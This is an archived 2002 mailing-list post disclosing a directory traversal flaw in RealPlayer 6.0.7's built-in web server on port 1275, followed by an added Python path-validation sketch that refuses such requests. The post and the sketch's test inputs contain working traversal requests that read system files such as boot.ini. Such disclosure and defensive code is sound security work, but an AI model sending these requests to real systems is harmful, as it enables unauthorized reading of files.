RealPlayer bug

From: §ome (exeat_private)
Date: Sat Mar 02 2002 - 10:16:53 PST


    hi
    open RealPlayer, go to --> File ---> Open File.. ---> Select any real media
    file.. ex: c:\music\file.ram
    Play the file.
    
    Now go to ---> View ---> Clip Source
    
    RealPlayer will open the URL
    http://127.0.0.1:1275/template.html?src=file://C:/music/file.ram
    From now on, realplay.exe will listen on port 1275 TCP.
    
    As you can see, RealPlayer has a (mini web server) that listens on port 1275.
    
    I only tested the ../../ bug
    
    GET http://127.0.0.1:1275/../../../../../boot.ini
    Result: my boot.ini
    
    Vulnerable version: 6.0.7
    
    Other versions? Maybe..
    
    
    C:\>fport |grep real
    Pid       Process       Port      Proto     Path
    1964    realplay   ->  1275     TCP      C:\Program Files\Real\RealPlayer\realplay.exe
    
    
    
    §ome1
    exeat_private
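
Added example, not part of the original post and not RealPlayer's code: a sketch of the request-path check an embedded web server needs so that a target like the one reported above is refused instead of served. The document root and the function name are assumptions, and the sample requests are constructed from the URLs in the post.

```python
import posixpath
from urllib.parse import unquote, urlsplit

DOC_ROOT = "/srv/player-templates"  # hypothetical document root (assumption)


def resolve_request_path(request_target, doc_root=DOC_ROOT):
    """Map an HTTP request-target to a file path under doc_root.

    Accepts origin-form ("/a.html") and absolute-form
    ("http://127.0.0.1:1275/a.html") targets. Returns None for anything
    that must be refused instead of served.
    """
    # urlsplit separates the path from scheme, host and query without
    # collapsing "..", so traversal segments are still visible here.
    path = unquote(urlsplit(request_target).path)  # decode exactly once
    if "\x00" in path:
        return None
    # Windows file APIs accept "\" as a separator, so treat it as one.
    segments = [s for s in path.replace("\\", "/").split("/")
                if s not in ("", ".")]
    if not segments:
        return None  # no directory listings
    for seg in segments:
        # ".." climbs out of the root; ":" would admit drive letters (C:).
        if seg == ".." or ":" in seg:
            return None
    candidate = posixpath.normpath(posixpath.join(doc_root, *segments))
    # Defence in depth: the normalised result must still sit under doc_root.
    if posixpath.commonpath([doc_root, candidate]) != doc_root:
        return None
    return candidate


if __name__ == "__main__":
    # Constructed sample requests; the first two use URLs from the post.
    for target in (
        "http://127.0.0.1:1275/template.html?src=file://C:/music/file.ram",
        "http://127.0.0.1:1275/../../../../../boot.ini",
        "/..%5c..%5cboot.ini",
    ):
        print(target, "->", resolve_request_path(target))
```

The check rejects a suspicious path outright instead of trying to clean it up, which avoids disagreements between the server's normalisation and the file system's.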
    



    This archive was generated by hypermail 2b30 : Sun Mar 03 2002 - 12:23:53 PST